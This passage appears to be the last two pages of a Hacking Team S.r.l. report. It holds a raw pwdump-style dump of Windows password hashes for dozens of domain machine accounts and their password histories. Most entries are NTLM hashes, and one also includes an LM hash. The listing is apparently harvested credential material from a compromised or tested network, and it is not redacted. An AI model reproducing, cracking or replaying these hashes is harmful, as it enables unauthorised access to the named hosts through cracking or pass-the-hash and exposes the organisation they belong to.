TD0020$_history_1:6660:NO PASSWORD*********************:7F125C72A6DDB479BF343C4CC5E37EC3:::
TD0020$_history_2:6660:NO PASSWORD*********************:C90383BE07EE535A2EE322986029BA89:::
TD0020$_history_3:6660:NO PASSWORD*********************:D335D5D26EF9A43E846A6E7C94F0C506:::
TD0020$_history_4:6660:NO PASSWORD*********************:C30F231F68F2C2A6C415EDB497CFFA7C:::
TD0020$_history_5:6660:NO PASSWORD*********************:5386F0874048AC11B6EF706014E1F83A:::
TD0020$_history_6:6660:NO PASSWORD*********************:018D76B2FEEE727063CB470AA5CF6F3E:::
TD0020$_history_7:6660:NO PASSWORD*********************:5A7FD624458A03E881D3759E754DAE73:::
TD0020$_history_8:6660:NO PASSWORD*********************:A2A97F6C5BA1A851BD1BA2F59ACC7B99:::
SWJ-XPKDXFSSIQM$:6661:NO PASSWORD*********************:3AD2522BB2877E42A556A62C4622469A:::
SWJ-XPKDXFSSIQM$_history_0:6661:NO PASSWORD*********************:85407DBF31132DFE95DD892DDEF0D734:::
BN0430$:6662:NO PASSWORD*********************:5E31F98334FB0B3CD9781FB6CB5C8150:::
BN0430$_history_0:6662:NO PASSWORD*********************:3E0CC4577C0981940F1EC4959B4FEB9E:::
BN0430$_history_1:6662:NO PASSWORD*********************:31FF39EE767355EE6C17C436BDF51C1D:::
BN0430$_history_2:6662:NO PASSWORD*********************:9A6244E0F47CE10A8434065B2EE88866:::
BN0430$_history_3:6662:NO PASSWORD*********************:AAF223D4B959C0D6FC1F7178D6BD8C7B:::
BN0430$_history_4:6662:NO PASSWORD*********************:D41BE9B0F80398CCAD69EA0D07366249:::
BN0430$_history_5:6662:NO PASSWORD*********************:A5F688A3EF9764635B2EF95CEC755853:::
BN0430$_history_6:6662:NO PASSWORD*********************:9C045BD04158D3022137C9F826B62734:::
BN0430$_history_7:6662:NO PASSWORD*********************:8A56BAE335040158464BCF3BCAD02EF7:::
BN0430$_history_8:6662:NO PASSWORD*********************:BFBBBBB4F43C74020F9838BBA391CBFA:::
BN0430$_history_9:6662:NO PASSWORD*********************:8EC9F0F4E601B5F530F7ACECA269F6DA:::
TH0439$:6663:NO PASSWORD*********************:3649BEE361C78AA1717E1D294EB2ABC5:::
TH0439$_history_0:6663:NO PASSWORD*********************:7FBC8853BC2D64E0395F97D790445B9F:::
TH0439$_history_1:6663:NO PASSWORD*********************:7A194331A9E2B2BEB07A50558715CC4D:::
TH0439$_history_2:6663:NO PASSWORD*********************:B1539BB1B30EAB95D1CB066AB6B6F5F1:::
TH0439$_history_3:6663:NO PASSWORD*********************:0A48FBBEFBADA7D547EA707A530F7A33:::
TH0439$_history_4:6663:NO PASSWORD*********************:62E52AC88CB930DC8FE9920233DDE9AF:::
TH0439$_history_5:6663:D6630C0E26F9F682AAD3B435B51404EE:C1D60AA393B223F3E1A134A32BD797B8:::
TH0439$_history_6:6663:NO PASSWORD*********************:282C01AB875B6AB3E40FC1A2ACBC6245:::
TH0439$_history_7:6663:NO PASSWORD*********************:553C291CB7F5E0423F9E5DBAEAB4F406:::
TH0439$_history_8:6663:NO PASSWORD*********************:C3D256DCDBF585833C9F6DEA422A001A:::
GG0413$:6664:NO PASSWORD*********************:DC9DD3FBB099EA5EAF6500BB7F3C16A0:::
GG0413$_history_0:6664:NO PASSWORD*********************:65DA51847F68A2E058429941CB89DE7D:::
GG0413$_history_1:6664:NO PASSWORD*********************:5EFF018464401E1933C65F1BE7FA8F72:::
GG0413$_history_2:6664:NO PASSWORD*********************:CEB65E12E9FA709CCCE7D25D76D95EA2:::
GG0413$_history_3:6664:NO PASSWORD*********************:CEB2BB444A9AB9C50602425CD71085B3:::
GG0413$_history_4:6664:NO PASSWORD*********************:B7FAC7BA04DE6C73E343451E973A8F3A:::
GG0413$_history_5:6664:NO PASSWORD*********************:849252034C29AF3F81386AEE5C40D53E:::
GG0413$_history_6:6664:NO PASSWORD*********************:8EB57389E99E4869A3E810CF212F2DEF:::
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 459 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
LONPLASMA0382$:6665:NO PASSWORD*********************:5699395DA77F94C8D3066D66F667BC6C:::
LONPLASMA0382$_history_0:6665:NO PASSWORD*********************:D78C81CF37B2D783A9AC483DBD49B474:::
LONPLASMA0382$_history_1:6665:NO PASSWORD*********************:455ED3CB0DC3204646422BD065DE1A44:::
LONPLASMA0382$_history_2:6665:NO PASSWORD*********************:BE74A5CF63B2589E92FD71646239C8C0:::
LONPLASMA0382$_history_3:6665:NO PASSWORD*********************:070D7779188DC96E2CDB610B0198726E:::
LONPLASMA0382$_history_4:6665:NO PASSWORD*********************:6FF641FF3CAB0F6FEC57140045D62BAD:::
LONPLASMA0382$_history_5:6665:NO PASSWORD*********************:A065E60DFD6E3B1A05530A7BB5E9B69C:::
LONPLASMA0382$_history_6:6665:NO PASSWORD*********************:6E00CB7FB451CF073CE5D9B9FAD9E674:::
LONPLASMA0382$_history_7:6665:NO PASSWORD*********************:7431B1DA4C704EAE5143E2B1EF284F09:::
LONPLASMA0072$:6666:NO PASSWORD*********************:8BE5792A8F8E75D60AA212A4A0773F8B:::
LONPLASMA0072$_history_0:6666:NO PASSWORD*********************:79ACFDF0DA686D9B670DB5431E507363:::
LONPLASMA0072$_history_1:6666:NO PASSWORD*********************:B5984E3EDAF3290A5E243620199F1858:::
LONPLASMA0072$_history_2:6666:NO PASSWORD*********************:B97DC9378245EC39F19298F18430EC14:::
LONPLASMA0072$_history_3:6666:NO PASSWORD*********************:DDAA66E631651C84E337F836A3BB3D89:::
LAPTOP0060$:6667:NO PASSWORD*********************:84A0C031E0455FE7C841DC77F46A62C9:::
LAPTOP0060$_history_0:6667:NO PASSWORD*********************:1114B46E037F8783E7A3772A30F5F82C:::
CPQEVO0055$:6668:NO PASSWORD*********************:D16D69000FD33360F56EA686B25808A4:::
CPQEVO0055$_history_0:6668:NO PASSWORD*********************:8D2D2D4B2094D8C40D2AC3334C21284E:::
CPQEVO0055$_history_1:6668:NO PASSWORD*********************:A968DC37894A0023BE8BE9EACAE09328:::
CPQEVO0055$_history_2:6668:NO PASSWORD*********************:8B52538452421B5191C2A81537F6F81B:::
NW0450$:6669:NO PASSWORD*********************:4F57588F7F3C344487D77E643E7B194E:::
NW0450$_history_0:6669:NO PASSWORD*********************:5629DB33864DFF2277FFB35AB2786DF5:::
NW0450$_history_1:6669:NO PASSWORD*********************:31468C905888EE355B027C1FBD37DA9A:::
NW0450$_history_2:6669:NO PASSWORD*********************:39A7C91664B0AA2789E5ECF3E052332C:::
NW0450$_history_3:6669:NO PASSWORD*********************:CF65A37C466F90E9ABCA06414A12FA2B:::
TEST0023$:6670:NO PASSWORD*********************:BACA382EC1E257E23F484F1A5C362FE8:::
LONAV02$:6671:NO PASSWORD*********************:54944F431BEFD07DAF46FAC65E7909AC:::
LONAV02$_history_0:6671:NO PASSWORD*********************:D54749A9A062EFD841B469BD8CEBE93E:::
LONAV02$_history_1:6671:NO PASSWORD*********************:4C981FCBF30322A11C4B4E77991EAE7D:::
GV436$:6672:NO PASSWORD*********************:46834C02B0E4CAB182871F1454675EEA:::
GV436$_history_0:6672:NO PASSWORD*********************:D4D0E937ED739FAB98760F83BB04F804:::
GV436$_history_1:6672:NO PASSWORD*********************:B36A63BA2A8F4B3F66217468FAE50DC9:::
CW0403$:6673:NO PASSWORD*********************:AF7699FE290C88E6DE19984559BBF6C2:::
FM0476$:6674:NO PASSWORD*********************:F394D2706ECC2C53A2A69B1F84E7782C:::
FM0476$_history_0:6674:NO PASSWORD*********************:BDC8FE53028A0AB1A5217743C8D2F167:::
JB0478$:6675:NO PASSWORD*********************:19B32CE0D7625A8611C78D42E2224FA7:::
JB0478$_history_0:6675:NO PASSWORD*********************:E550E4F95E8BD226AC02D82C2696EAF6:::
JB0478$_history_1:6675:NO PASSWORD*********************:32CDFC35BF10A8639EA4734DE6C4DDC2:::
PK0395$:6677:NO PASSWORD*********************:67D9E9B0FF4ED7129D7912258B725151:::
PK0395$_history_0:6677:NO PASSWORD*********************:E2F694FB88287FBFF9B4A84208EB368F:::
PK0395$_history_1:6677:NO PASSWORD*********************:AD7204C38F5FC7C753C398F99F58FEAA:::
AR0370$:6678:NO PASSWORD*********************:A7E3FEA7B21EA5E7192059EBFEE46BE3:::
MTSDRREPORTDB$:11104:NO PASSWORD*********************:AF17DB72A900994447EDEE359968EDEF:::
MTSDRREPORTDB$_history_0:11104:NO PASSWORD*********************:BE65583CD8853BE012B417A70E2C87DE:::
MTSDRREPORTDB$_history_1:11104:NO PASSWORD*********************:995662EE115395C73A9B1779321DB7DC:::
MTSDRREPORTDB$_history_2:11104:NO PASSWORD*********************:FA55290DC6A339A35627ADA7EB80F0E2:::
MTSDRREPORTDB$_history_3:11104:NO PASSWORD*********************:109DD4CC6BA3916A89368CE584EE2335:::
MTSDRREPORTDB$_history_4:11104:NO PASSWORD*********************:C07680102622CA7A6518C330BAC8F6BA:::
MTSDRREPORTDB$_history_5:11104:NO PASSWORD*********************:9F95B86A440B70A5510E98DFF214723E:::
MTSDRREPORTDB$_history_6:11104:NO PASSWORD*********************:ECD9AC6863F68604B583E864D5871539:::
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 460 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.